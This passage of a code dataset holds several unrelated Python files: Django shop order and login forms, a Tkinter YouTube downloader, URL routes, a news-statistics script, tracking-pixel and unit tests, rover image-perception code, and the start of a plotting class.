self.attrs.copy(), choice, i)\n\n def __getitem__(self, idx):\n choice = self.choices[idx] # Let the IndexError propogate\n return HTMLRadioInput(self.name, self.value, self.attrs.copy(), choice, idx)\n\n\nclass OrderForm(forms.ModelForm):\n done = forms.BooleanField(widget=NoRenderInput, required=False)\n \n class Meta:\n model = Order\n fields = ('contact', 'fio', 'phone', 'email', 'delivery', 'country', 'city', 'post_index', 'address', 'requisites', 'comment')\n\n def __init__(self, location, *args, **kwargs):\n super(OrderForm, self).__init__(*args, **kwargs)\n if location and location.metro_stations:\n choices = [('', '--------')] + [(i, i) for i in location.metro_stations.splitlines() if i.strip()]\n self.fields = OrderedDict(\n self.fields.items()[:5]\n + [('metro_station', forms.ChoiceField(choices,\n label=Order._meta.get_field('metro_station').verbose_name,\n required=False))]\n + self.fields.items()[5:]\n )\n delivery_choices = []\n for k, v in DELIVERY_METHODS:\n if (self.instance.ws and v.value5) or (not self.instance.ws and v.value4):\n delivery_choices.append((k, mark_safe(u'%s
    %s
    ' % (v, v.value))))\n if self.instance.ws:\n choices = delivery_choices\n else:\n choices = []\n if location and location.delivery_methods:\n for k,v in delivery_choices:\n if k in map(int, location.delivery_methods.split(',')):\n choices.append((k,v))\n else:\n for k,v in delivery_choices:\n if k in (1,4):\n choices.append((k,v))\n self.fields['delivery'].choices = choices\n self.fields['delivery'].widget = forms.RadioSelect(choices=choices, renderer=HTMLRadioFieldRenderer)\n self.fields['delivery'].required = True\n self.fields['fio'].help_text = u'Как к Вам обращаться'\n self.fields['phone'].help_text = u'Для уточнения данных по доставке'\n self.fields['email'].help_text = u'Куда выслать информацию по заказу'\n\n\n def save(self, request):\n obj = super(OrderForm, self).save(commit=False)\n obj.metro_station = self.cleaned_data.get('metro_station', '')\n obj.location = request.SHOP_LOCATION or None\n obj.status = 1 #!!!!!!!!!!!!!\n obj.save()\n self.save_m2m()\n return obj\n \n def as_table(self):\n return self._html_output(\n normal_row = u'%(label)s%(errors)s%(field)s%(help_text)s',\n error_row = u'%s',\n row_ender = u'',\n help_text_html = u'%s',\n errors_on_separate_row = False)\n\n def clean_phone(self):\n phone = self.cleaned_data.get('phone')\n if not phone:\n raise forms.ValidationError(u'Обязательное поле')\n return phone\n\n def clean_delivery(self):\n delivery = self.cleaned_data.get('delivery')\n if not delivery:\n raise forms.ValidationError(u'Обязательное поле')\n return delivery\n \n def clean_payment(self):\n payment = self.cleaned_data.get('payment')\n if not payment:\n raise forms.ValidationError(u'Обязательное поле')\n\n delivery = self.cleaned_data.get('delivery')\n if delivery and not payment in dict(DELIVERY_METHODS)[delivery].value2:\n raise forms.ValidationError(u'При данном способе доставки этот способ оплаты недоступен')\n return payment\n \n def send(self):\n from django.core.mail import send_mail\n obj = self.instance\n obj.status = 1 #!!!!!!!!!!!!!!!!\n obj.save()\n obj.orderitem_set.filter(count=0).delete()\n \n #send_mail(u'King Bong: %s' % obj, \n # render_to_response('shop/mail/new_order_notification.txt', {'order': obj}),\n # u'King Bong ',\n # settings.SHOP_NOTIFICATIONS, \n # fail_silently=True)\n \n def clean_post_index(self):\n if self.cleaned_data.get('delivery') == 1 and not self.cleaned_data.get('post_index'):\n raise forms.ValidationError(u'Укажите почтовый индекс')\n return self.cleaned_data.get('post_index')\n \n def clean(self):\n if self.instance.ws and self.instance.price < settings.MIN_ORDER_PRICE_WS:\n raise forms.ValidationError(u'Извините, минимальный оптовый заказ — %s рублей' % settings.MIN_ORDER_PRICE_WS)\n if not self.instance.ws and self.instance.price-self.instance.delivery_price < settings.MIN_ORDER_PRICE:\n raise forms.ValidationError(u'Извините, минимальный заказ — %s рублей' % settings.MIN_ORDER_PRICE)\n return self.cleaned_data\n \n \nclass OIForm(forms.ModelForm):\n class Meta:\n model = OrderItem\n exclude = ('item',)\n\n def __init__(self, *args, **kwargs):\n super(OIForm, self).__init__(*args, **kwargs)\n self.fields['count'].widget.attrs.update({'size': 3, 'maxlength': 3, 'min': 1, 'step': 1, 'max': 999})\n\nclass OIFormSet(forms.models.BaseModelFormSet):\n class Meta:\n model = OrderItem\n \n def as_table(self):\n return render_to_string('shop/basket_form.html', { \n 'forms':self.forms,\n 'request': self.request,\n })\n\n def get_ajax_update(self, oi_id):\n from primus.base.templatetags.calc import intspace\n\n try:\n order = Order.objects.get(orderitem__id=oi_id)\n except Order.DoesNotExist: # order is already deleted? Tampered data?\n return ''\n \n out = {'basket_inclusion': render_to_response('shop/basket_inclusion.html', {'order': order}).content,\n 'sum': intspace(order.price),\n 'delivery': order.delivery_price,\n 'weight': order.weight\n }\n \n if oi_id:\n try:\n oi = self.queryset.get(id=oi_id)\n except OrderItem.DoesNotExist:\n return ''\n \n out.update({'row': intspace(oi.price),\n 'row_weight': oi.weight})\n return json.dumps(out)\n\nclass KBLoginForm(AuthenticationForm):\n \n def __init__(self, *args, **kwargs):\n super(KBLoginForm, self).__init__(*args, **kwargs)\n self.fields['username'].label = u'Телефон'\n self.fields['username'].help_text = kb_username_description\n\nclass KBRegisterForm(forms.ModelForm):\n username = forms.CharField(label=u'Телефон', max_length=30, required=True, help_text=kb_username_description)\n email = forms.EmailField(label=_(u'E-mail'), required=False)\n \n class Meta:\n model = User\n fields = ('username', 'email',)\n\n def __init__(self, *args, **kwargs):\n super(KBRegisterForm, self).__init__(*args, **kwargs)\n \n def clean_username(self):\n username = self.cleaned_data.get('username')\n if not re_kb_username.search(username):\n raise forms.ValidationError(kb_username_description)\n\n if username:\n try:\n User.objects.get(username=username)\n except User.DoesNotExist:\n pass\n else:\n raise forms.ValidationError(_(u'Пользователь с таким именем уже существует'))\n return username\n\n def save(self, commit=True):\n user = super(KBRegisterForm, self).save(commit=False)\n password = generate_password()\n user.set_password(password)\n user.save()\n KBProfile.objects.create(user=user)\n IQSMS().send('7'+user.username, u'Интернет-магазин King-Bong.ru. Ваш пароль %s' % password)\n return user\n \nclass KBPassResetForm(forms.Form):\n username = forms.CharField(label=u'Телефон', max_length=30, required=True, help_text=kb_username_description)\n\n def clean_username(self):\n username = self.cleaned_data.get('username')\n if not re_kb_username.search(username) and not User.objects.filter(username=username):\n raise forms.ValidationError(kb_username_description)\n if username:\n try:\n self.user = User.objects.get(username=username)\n except User.DoesNotExist:\n raise forms.ValidationError(u'Такой пользователь не зарегистрирован.')\n \n return self.cleaned_data.get('username')\n \n def save(self):\n password = generate_password()\n self.user.set_password(password)\n self.user.save()\n IQSMS().send('7'+self.user.username, u'Интернет-магазин King-Bong.ru. Ваш пароль %s' % password)\n\nclass SearchForm(forms.Form):\n query = forms.CharField(label=u'Ключевое слово', required=False)\n \n def clean_query(self):\n q = self.cleaned_data.get('query')\n if not q:\n raise forms.ValidationError(u'Чтобы получить результат введите что-нибудь в поле поиска')\n if len(q) < 2:\n raise forms.ValidationError(u'Пожалуйста, введите 2 или более символов')\n return q\n\n def filter(self, items):\n from django.db.models import Q\n\n query = self.cleaned_data.get('query', '')\n qobj = reduce(lambda x,y: x | y, (Q(**{'%s__icontains' % a:query}) for a in ('title', 'article', 'category__title')))\n return items.filter(qobj).distinct()\n","sub_path":"shop/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":14780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"276266918","text":"from pytube import YouTube\nfrom tkinter import *\nfrom tkinter.filedialog import *\nfrom tkinter.messagebox import *\nfrom PIL import ImageTk, Image\nfrom urllib.request import urlopen\nfrom io import BytesIO\nfrom threading import *\nimport os\n\n\ndef onClickSearch():\n global video\n video = YouTube(url.get())\n\n raw_data = urlopen(video.thumbnail_url).read()\n im = Image.open(BytesIO(raw_data))\n im = im.resize((round(im.size[0]*0.15), round(im.size[1]*0.15)))\n\n thumb_img = ImageTk.PhotoImage(im)\n thumb = Label(image=thumb_img)\n thumb.image = thumb_img\n thumb.pack(anchor=W, padx=30, pady=5)\n\n video_label = Label(root, text=video.title)\n video_label.pack(anchor=W, padx=30, pady=5)\n\ndef btnClicked():\n try:\n downloadBtn['text'] = \"Please Wait...\"\n downloadBtn[\"state\"] = 'disabled'\n print(video)\n thread = Thread(target=startDownload, args=(url,)) # bloody comma is important\n thread.start()\n except Exception as e:\n print(e)\n\n# Download Function\ndef startDownload(url):\n global file_size\n path_to_save = askdirectory()\n if path_to_save is None:\n return\n downloadBtn[\"status\"] = \"active\"\n if os.path.isfile(video.description): print(\"Video already exists\")\n\n try:\n st = video.streams.first()\n\n video.register_on_complete_callback(completeDownload)\n video.register_on_progress_callback(progressDownload)\n\n file_size = st.filesize\n st.download(output_path=path_to_save)\n except Exception as e:\n print(e)\n downloadBtn['text'] = \"Something went wrong\"\n\ndef progressDownload(stream=None, chunk=None, bytes_remaining=None):\n percent = (100 * ((file_size-bytes_remaining)/file_size))\n downloadBtn['text'] = \"{:00.0f}% downloaded \".format(percent)\n\ndef completeDownload(stream=None, file_path=None):\n print(\"Download completed\")\n showinfo(\"Message\", \"File has been downloaded\")\n downloadBtn['text'] = \"Download Video\"\n downloadBtn['state'] = \"active\"\n url.delete(0,END)\n\n# GUI Coding\nroot = Tk()\nroot.title(\"Youtube Downloader\")\nroot.iconbitmap(\"youtube-downloader-gui\\iconfinder_play_alt_118620.ico\")\nroot.geometry(\"700x500\")\n\nfile = PhotoImage(file=\"youtube-downloader-gui/youtube-icon-vid.png\")\nheadingIcon = Label(root, image=file)\nheadingIcon.pack(side=TOP, pady=3)\n\nurl_frame = LabelFrame(root, padx=10, pady=10)\nurl_frame.pack(padx=30, pady=20)\n\nurl_label = Label(url_frame, padx=10, anchor=W, text=\"URL:\")\nurl_label.grid(row=0, column=0, padx=10, pady=10)\n\nurl = Entry(url_frame, borderwidth=5, width=50)\nurl.grid(row=0, column=1, padx=10, pady=10)\n\nbutton = Button(url_frame, text=\"Search\", padx=10, command=onClickSearch)\nbutton.grid(row=0, column=3, padx=10, pady=10)\n\ndownloadBtn = Button(root, text=\"Download Video\", relief=\"ridge\", command=btnClicked)\ndownloadBtn.pack(side=BOTTOM, pady=20)\n\nroot.mainloop()\n\n# nice icon - Icons made by
    Flat Icons from www.flaticon.com\n# Test video: https://www.youtube.com/watch?v=9XaS93WMRQQ","sub_path":"ytdl.py","file_name":"ytdl.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637590538","text":"from django.urls import path\n# from api.views import show_taskLists, show_current_taskList, show_current_tasks\nfrom api.views import TaskLists, TaskListDetail, TaskListTasks, UserList\nfrom api.views import UserList, login, logout\n# urlpatterns = [\n# path('task_lists/', show_taskLists),\n# path('task_lists//', show_current_taskList),\n# path('task_lists//tasks/', show_current_tasks)\n# ]\nurlpatterns = [\n path('task_lists/', TaskLists.as_view()),\n path('task_lists//', TaskListDetail.as_view()),\n path('users/', UserList.as_view()),\n path('login/', login),\n path('logout/', logout),\n path('task_lists//tasks/', TaskListTasks.as_view())\n]","sub_path":"w13/week 13/todo-back/todo_back/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"479749971","text":"# !/usr/bin/env python3\n\"\"\"\nanalyze_data.py\n\nThis script gathers information about the data distribution in the form of counts for newspapers, political orientation and countries, both per cop and in total.\n\"\"\"\n\nfrom main import *\nfrom constants import *\n\n\ndef basics(cop):\n stats = dict()\n stats['date_from'] = cop['collection_start']\n stats['date_to'] = cop['collection_end']\n return stats\n\n\ndef counts(articles):\n counts = dict()\n counts['total_articles'] = len(articles)\n counts['newspapers'] = dict([(np,0) for np in get_newspaper_list()])\n counts['labels'] = {'Right-Center':0, 'Left-Center':0}\n counts['country'] = {'Australian':0, 'India':0, 'South Africa':0, 'United States':0}\n\n for article in articles:\n counts['newspapers'][article['newspaper']] += 1\n counts['labels'][get_newspaper_orientation(article['newspaper'])] += 1\n counts['country'][get_newspaper_country(article['newspaper'])] += 1\n\n return counts\n\n\ndef get_stats_per_cop(cop_selection=None):\n cop_data = read_data(cop_selection)\n statistics = dict()\n for cop in cop_data:\n statistics[cop] = dict()\n statistics[cop]['basics'] = dict()\n statistics[cop]['basics'] = basics(cop_data[cop])\n statistics[cop]['counts'] = dict()\n statistics[cop]['counts'] = counts(cop_data[cop]['articles'])\n\n return statistics\n\n\ndef get_stats(cop_selection=None):\n cop_data = read_data(cop_selection)\n articles = list()\n\n if not cop_selection:\n cop_selection = cop_data.keys()\n for cop in cop_selection:\n articles = articles + cop_data[cop]['articles']\n\n stats = dict()\n stats['counts'] = counts(articles)\n return stats\n\n\nif __name__ == '__main__':\n print(get_stats_per_cop(list(range(5,6))))\n uniques = get_unique_classifications()\n print(len(uniques['subject']))\n print(len(uniques['organization']))\n print(len(uniques['subject']))\n print(len(uniques['subject']))\n","sub_path":"analyze_data.py","file_name":"analyze_data.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"600980590","text":"import datetime\n\nclass user():\n def __init__(self,first_name,last_name,pin,admin):\n self.first_name = first_name\n self.last_name = last_name\n self.administrator = admin\n self.pin = pin\n \n \n# menuItem: each object is a menu item\nclass menuItem():\n def __init__(self, name, cost, index = 0):\n self.name = name\n self.cost = cost\n self.index = index\n def __str__(self):\n return '{0:=<20s} {1:>5.2f}'.format(self.name,self.cost)\n\n# tableOrder is a class that stores the order's owner, menuItems ordered, and several\n# other important attributes for use by program \nclass tableOrder():\n def __init__(self, m_user):\n self.menuItems = []\n self.timeOpened = str(datetime.datetime.now())\n self.timeClosed = False\n self.m_split = 1\n self.m_table = 0\n self.m_guests = 1\n self.m_user = m_user\n self.m_subTotal = 0\n self.orderNumber = 0\n def close(self):\n if not self.timeClosed:\n self.timeClosed = str(datetime.datetime.now())\n def subTotal(self):\n return sum(m.cost for m in self.menuItems)\n \n def add_menuItem(self, menuItem):\n self.menuItems.append(menuItem)\n self.m_subTotal = self.subTotal()\n \n \nif __name__ == \"__main__\":\n u = user(\"jesse\",\"harper\",1234)\n o = tableOrder(user)\n o.close()\n print(o.timeOpened)\n print(o.timeClosed)","sub_path":"mainProgram/dataFields.py","file_name":"dataFields.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"481620903","text":"import selftest as T\nfrom TestMore import *\n\n\nT.plan(9)\nT.reset()\n\ndef throw(e):\n raise e\n\n\nT.ok(raises_like(lambda: throw(NotCallable(123)),\n lambda e: str(e) == \"Can't call 123\",\n \"raising with correct error message\"),\n \"raises_like succeeds if callback returns truthy\")\n\nT.ok(not raises_like(lambda: throw(NotNullary(456)),\n lambda e: str(e) != \"Callback is not allowed \"\n \"to take arguments: 456\"),\n \"raises_like fails if callback returns falsy\")\n\n\nexpected = \"You want to check if something raises SystemExit, but only \" \\\n \"subtypes of Exception are caught in the first place. Maybe you \" \\\n \"need to pass a catch argument, such as catch=BaseException?\"\ndef callback_that_raises(e):\n if str(e) == expected:\n raise ValueError\n\nraised = T.getraised(lambda: raises_like(\n lambda: throw(NotCaught(SystemExit, Exception)),\n callback_that_raises))\nT.ok(type(raised) is ValueError, \"raising in callback propagates\")\n\n\nraised = T.getraised(lambda: raises_like(\"not callable\", throw))\nT.ok(type(raised) is NotCallable, \"uncallable code raises NotCallable\")\n\nraised = T.getraised(lambda: raises_like(lambda x: \"not nullary\", throw))\nT.ok(type(raised) is NotNullary, \"code with required arg raises NotNullary\")\n\nraised = T.getraised(lambda: raises_like(lambda: 1, \"also not callable\"))\nT.ok(type(raised) is NotCallable, \"uncallable callback raises NotCallable\")\n\nraised = T.getraised(lambda: raises_like(lambda: 1, lambda: \"wrong args\"))\nT.ok(type(raised) is TypeError, \"wrong arguments in callback raises TypeError\")\n\n\ndone_testing()\n\n\nT.output_ok(\"ok 1 - raising with correct error message\\n\"\n \"not ok 2\\n\"\n \"1..2\\n\",\n \"correct output from raises_like\")\n\nT.error_ok(\"# Failed test at 20_raises_like.t.py in line 18\\n\",\n \"correct error output from raises_like\")\n","sub_path":"t/20_raises_like.t.py","file_name":"20_raises_like.t.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"573188138","text":"# -*- coding: utf-8 -*-\nimport json\nimport logging\nimport os\nimport unittest\n\nfrom nose_parameterized import parameterized\n\nfrom tracking_utils import HarFileHandler, AustraliaHARData\nfrom tracking_testdata import *\n\n\nPRINT_ALL_MATCHING_REQUESTS = True\nPATH = os.getcwd()\nHOST = \"www.deliveryhero.com.au\"\n\n\nclass TrackingPixelsTest(unittest.TestCase):\n\n @classmethod\n def setupClass(self):\n self.harfilehandler = HarFileHandler(PATH)\n self.harfilehandler.delete_all_har_files_in_path()\n australia = AustraliaHARData(HOST, PATH)\n self.ordnum_logged_out, self.ordid_logged_out = (\n australia.happy_path())\n self.harfilehandler.cleanup_logged_out()\n self.ordnum_logged_in, self.ordid_logged_in = (\n australia.happy_path(should_log_in=True))\n self.harfilehandler.cleanup_logged_in()\n\n def print_culprit(self, key, value, search_string):\n msg = (\"Key/value pair ('%s': '%s') not found on page \"\n \"'%s' when testing the tracking pixel provider '%s'\" %\n (key, value, self.testname, search_string))\n logging.error(msg)\n self.error_msgs.append(msg)\n\n @parameterized.expand([\n (1, 'homepage_logged_out'),\n (1, 'homepage_logged_in'),\n (2, 'RLpage_logged_out'),\n (2, 'RLpage_logged_in'),\n (3, 'menupage_logged_out'),\n (3, 'menupage_logged_in'),\n (4, 'checkoutpage_logged_out'),\n (4, 'checkoutpage_logged_in'),\n (5, 'OCPpage_logged_out'),\n (5, 'OCPpage_logged_in')\n ])\n def test_tracking_pixel_calls(self, index, testname):\n filename = '%s_%s.har' % (index, testname)\n test_data = globals()[testname]\n self.testname = testname\n file_full_path = os.path.join(PATH, filename)\n with open(file_full_path, 'r') as har_file:\n data = json.load(har_file)\n\n self.error_msgs = []\n for item in test_data:\n name = item['name']\n search_list = item['data']\n\n # verbose printing of all matching requests in the given har file\n if PRINT_ALL_MATCHING_REQUESTS:\n self.harfilehandler.print_matching_requests(\n name, data, testname)\n\n # this here is the actual test method\n status = self.testname.split('_')[-1]\n order_number = getattr(self, 'ordnum_logged_%s' % (status, ))\n order_id = getattr(self, 'ordid_logged_%s' % (status, ))\n result = self.harfilehandler.find_in_logfiles(\n name, search_list, data, HOST, order_number, order_id)\n\n # None is returned if for a search string, there are no\n # key-value-pairs to look for. In this case, we skip the it\n if not result:\n continue\n\n # all key-value-pairs should have been found, otherwise\n # log the offending pairs\n if not all(x == 'found' for x in result.values()):\n [self.print_culprit(key, value, name)\n for key, value in result.iteritems()\n if value != 'found']\n\n # and there should be no error messages\n assert not self.error_msgs, self.error_msgs\n\n\ndef main():\n unittest.main()\n\nif __name__ == '__main__':\n main()\n","sub_path":"au/tracking_pixels/test_tracking_pixels.py","file_name":"test_tracking_pixels.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"393334572","text":"import pandas as pd\n\ndef get_data():\n df = pd.read_csv('data/detect.csv')\n Y_df = df['feel']\n X_df = df[['rate_blink_left', 'rate_blink_right', 'rate_smile_or_not']]\n Xdummies_df = pd.get_dummies(X_df)\n Ydummies_df = Y_df\n\n X = Xdummies_df.values\n Y = Ydummies_df.values\n return X, Y\n\ndef get_full_data():\n df = pd.read_csv('data/detect.csv')\n # df = df.sample(frac=1)\n Y_df = df['feel']\n X_df = df[['rate_blink_left', 'rate_blink_right', 'rate_smile_or_not']]\n\n Y = Y_df\n X = X_df\n return X, Y, df\n\ndef get_who_is():\n df = pd.read_csv('data/whois.csv')\n Y_df = df['feel']\n X_df = df[['rate_blink_left', 'rate_blink_right', 'rate_smile_or_not']]\n\n Y = Y_df\n X = X_df\n return X, Y, df\n\ndef get_predict():\n df = pd.read_csv('data/predict.csv')\n Y_df = df['feel']\n X_df = df[['rate_blink_left', 'rate_blink_right', 'rate_smile_or_not']]\n\n Y = Y_df\n X = X_df\n return X, Y, df\n\n\ndef get_evaluate():\n df = pd.read_csv('data/whois.csv')\n Y_df = df['feel']\n X_df = df[['rate_blink_left', 'rate_blink_right', 'rate_smile_or_not']]\n\n Y = Y_df\n X = X_df\n X_train = X[0:4263]\n y_train = Y[0:4263]\n X_test = X[4264:]\n y_test = Y[4264:]\n return X_train, y_train, X_test, y_test","sub_path":"server/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"408707228","text":"import numpy as np\nimport cv2\n\n# Identify pixels above the threshold\n# Threshold of RGB > 160 does a nice job of identifying ground pixels only\n# Define a function to perform a perspective transform\ndef perspect_transform(img, src, dst):\n \n M = cv2.getPerspectiveTransform(src, dst)\n warped = cv2.warpPerspective(img, M, (img.shape[1], img.shape[0]))# keep same size as input image\n \n return warped\n\ndef color_thresh(img, rgb_thresh=(160, 160, 160)):\n # Create an array of zeros same xy size as img, but single channel\n path = np.zeros_like(img[:,:,0])\n obstacles = np.zeros_like(img[:,:,0])\n # Require that each pixel be above all three threshold values in RGB\n # above_thresh will now contain a boolean array with \"True\"\n # where threshold was met\n above_thresh = (img[:,:,0] > rgb_thresh[0]) \\\n & (img[:,:,1] > rgb_thresh[1]) \\\n & (img[:,:,2] > rgb_thresh[2])\n below_thresh = (img[:,:,0] < rgb_thresh[0]) \\\n & (img[:,:,1] < rgb_thresh[1]) \\\n & (img[:,:,2] < rgb_thresh[2])\n # Index the array of zeros with the boolean array and set to 1\n path[above_thresh] = 1\n obstacles[below_thresh] = 1\n path3d = np.dstack((path*0, path*255, path*0)).astype(np.float)\n obstacles3d = np.dstack((obstacles*0, obstacles*0, obstacles*255)).astype(np.float)\n # Return the binary image\n return path, obstacles, path3d, obstacles3d\n\n#Define a function to find the rocks\ndef find_rock(img, lower_thresh, upper_thresh):\n dst_size = 5 \n bottom_offset = 6\n source = np.float32([[14, 140], [301 ,140],[200, 96], [118, 96]])\n destination = np.float32([[img.shape[1]/2 - dst_size, img.shape[0] - bottom_offset],\n [img.shape[1]/2 + dst_size, img.shape[0] - bottom_offset],\n [img.shape[1]/2 + dst_size, img.shape[0] - 2*dst_size - bottom_offset], \n [img.shape[1]/2 - dst_size, img.shape[0] - 2*dst_size - bottom_offset],\n ])\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(hsv,lower_thresh,upper_thresh)\n res = cv2.bitwise_and(img,img, mask = mask)\n return mask, res\n\n\n# Define a function to convert from image coords to rover coords\ndef rover_coords(binary_img):\n # Identify nonzero pixels\n ypos, xpos = binary_img.nonzero()\n # Calculate pixel positions with reference to the rover position being at the \n # center bottom of the image. \n x_pixel = -(ypos - binary_img.shape[0]).astype(np.float)\n y_pixel = -(xpos - binary_img.shape[1]/2 ).astype(np.float)\n return x_pixel, y_pixel\n\n\n# Define a function to convert to radial coords in rover space\ndef to_polar_coords(x_pixel, y_pixel):\n # Convert (x_pixel, y_pixel) to (distance, angle) \n # in polar coordinates in rover space\n # Calculate distance to each pixel\n dist = np.sqrt(x_pixel**2 + y_pixel**2)\n # Calculate angle away from vertical for each pixel\n angles = np.arctan2(y_pixel, x_pixel)\n return dist, angles\n\n# Define a function to map rover space pixels to world space\ndef rotate_pix(xpix, ypix, yaw):\n # Convert yaw to radians\n yaw_rad = yaw * np.pi / 180\n xpix_rotated = (xpix * np.cos(yaw_rad)) - (ypix * np.sin(yaw_rad))\n \n ypix_rotated = (xpix * np.sin(yaw_rad)) + (ypix * np.cos(yaw_rad))\n # Return the result \n return xpix_rotated, ypix_rotated\n\ndef translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale): \n # Apply a scaling and a translation\n xpix_translated = (xpix_rot / scale) + xpos\n ypix_translated = (ypix_rot / scale) + ypos\n # Return the result \n return xpix_translated, ypix_translated\n\n\n# Define a function to apply rotation and translation (and clipping)\n# Once you define the two functions above this function should work\ndef pix_to_world(xpix, ypix, xpos, ypos, yaw, world_size, scale):\n # Apply rotation\n xpix_rot, ypix_rot = rotate_pix(xpix, ypix, yaw)\n # Apply translation\n xpix_tran, ypix_tran = translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale)\n # Perform rotation, translation and clipping all at once\n x_pix_world = np.clip(np.int_(xpix_tran), 0, world_size - 1)\n y_pix_world = np.clip(np.int_(ypix_tran), 0, world_size - 1)\n # Return the result\n return x_pix_world, y_pix_world\n\n# Apply the above functions in succession and update the Rover state accordingly\ndef perception_step(Rover):\n # Perform perception steps to update Rover()\n # TODO: \n # NOTE: camera image is coming to you in Rover.img\n # 1) Define source and destination points for perspective transform\n dst_size = 5 \n bottom_offset = 6\n img = Rover.img\n source = np.float32([[14, 140], [301 ,140],[200, 96], [118, 96]])\n destination = np.float32([[img.shape[1]/2 - dst_size, img.shape[0] - bottom_offset],\n [img.shape[1]/2 + dst_size, img.shape[0] - bottom_offset],\n [img.shape[1]/2 + dst_size, img.shape[0] - 2*dst_size - bottom_offset], \n [img.shape[1]/2 - dst_size, img.shape[0] - 2*dst_size - bottom_offset],\n ])\n # 2) Apply perspective transform\n warped = perspect_transform(img,source,destination)\n # 3) Apply color threshold to identify navigable terrain/obstacles/rock samples\n low_yellow = np.array([90,100,100])\n up_yellow = np.array([100,255,255])\n path, obstacles, path3d, obstacles3d = color_thresh(warped)\n rocks,res =find_rock(warped, low_yellow, up_yellow) # 4) Update Rover.vision_image (this will be displayed on left side of screen)\n Rover.vision_image[:,:,2]=(obstacles+rocks)*255\n Rover.vision_image[:,:,1]=(path+rocks)*255\n Rover.vision_image[:,:,0]=rocks\n\n # Example: Rover.vision_image[:,:,0] = obstacasle color-thresholded binary image\n # Rover.vision_image[:,:,1] = rock_sample color-thresholded binary image\n # Rover.vision_image[:,:,2] = navigable terrain color-thresholded binary image\n\n # 5) Convert map image pixel values to rover-centric coords\n x_pixel,y_pixel = rover_coords(path)\n x_obspix,y_obspix = rover_coords(obstacles)\n x_rockpix,y_rockpix = rover_coords(rocks)\n # 6) Convert rover-centric pixel values to world coordinates\n worldmap = np.zeros((200, 200))\n world_size = worldmap.shape[0]\n scale = 2*dst_size\n x_worldpix,y_worldpix = pix_to_world(x_pixel,y_pixel,Rover.pos[0],Rover.pos[1],Rover.yaw,world_size,scale)\n x_worldobspix,y_worldobspix = pix_to_world(x_obspix,y_obspix,Rover.pos[0],Rover.pos[1],Rover.yaw,world_size,scale)\n x_worldrock,y_worldrock = pix_to_world(x_rockpix,y_rockpix,Rover.pos[0],Rover.pos[1],Rover.yaw,world_size,scale)\n # 7) Update Rover worldmap (to be displayed on right side of screen)\n Rover.worldmap[y_worldobspix,x_worldobspix,0] = 255\n Rover.worldmap[y_worldpix,x_worldpix,2] += 10\n nav_pix = Rover.worldmap[:,:,2] > 0\n # Rover.worldmap[nav_pix,0] = 0\n Rover.worldmap[y_worldrock,x_worldrock,:] = 255\n # Example: Rover.worldmap[obstacle_y_world, obstacle_x_world, 0] += 1\n # Rover.worldmap[rock_y_world, rock_x_world, 1] += 1\n # Rover.worldmap[navigable_y_world, navigable_x_world, 2] += 1\n\n # 8) Convert rover-centric pixel positions to polar coordinates\n \n dist,angle = to_polar_coords(x_pixel,y_pixel)\n rockdist,rockangle = to_polar_coords(x_rockpix, y_rockpix)\n Rover.rock_dists = rockdist\n Rover.mean_rockdists = np.mean(rockdist)\n Rover.rock_angle = rockangle\n # Update Rover pixel distances and angles\n Rover.nav_dists = dist\n\n Rover.nav_angles = angle \n \n \n \n # Rover.nav_dists = rover_centric_pixel_distances\n # Rover.nav_angles = rover_centric_angles\n \n return Rover","sub_path":"code/perception.py","file_name":"perception.py","file_ext":"py","file_size_in_byte":7784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"615476648","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 7 14:22:11 2020\n\n@author: briardoty\n\"\"\"\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\ntry:\n from .StatsProcessor import StatsProcessor\nexcept:\n from StatsProcessor import StatsProcessor\n\ntry:\n from .NetManager import nets\nexcept:\n from NetManager import nets\n\ntry:\n from .ActivationFunctions import *\nexcept:\n from ActivationFunctions import *\n\ntry:\n from .util import ensure_sub_dir\nexcept:\n from util import ensure_sub_dir\n\nimport matplotlib\nmatplotlib.rc('xtick', labelsize=14) \nmatplotlib.rc('ytick', labelsize=14) \n\ndef get_key(dct, val):\n\n for k, v in dct.items():\n if val == v:\n return k\n return None\n\ndef get_component_cases(case_dict, case):\n \"\"\"\n Returns the names of cases that compose the given mixed case\n\n Args:\n case_dict (dict)\n case: the mixed case \n \"\"\"\n\n # identify \"component\" cases...\n def param_to_float(p):\n return float(p) if p != \"None\" else p\n\n z = list(zip(case_dict[case][\"act_fns\"], [param_to_float(p) for p in case_dict[case][\"act_fn_params\"]]))\n component_cases = []\n\n for k, v in case_dict.items():\n\n if len(component_cases) >= len(z):\n return component_cases\n \n if (len(v[\"act_fns\"]) == 1 \n and (v[\"act_fns\"][0], param_to_float(v[\"act_fn_params\"][0])) in z):\n component_cases.append(k)\n\n return component_cases\n\nclass Visualizer():\n \n def __init__(self, data_dir, n_classes=10, save_fig=False, refresh=False):\n \n self.data_dir = data_dir\n self.save_fig = save_fig\n self.refresh = refresh\n \n self.stats_processor = StatsProcessor(data_dir, n_classes)\n \n def plot_activation_fns(self, act_fns):\n 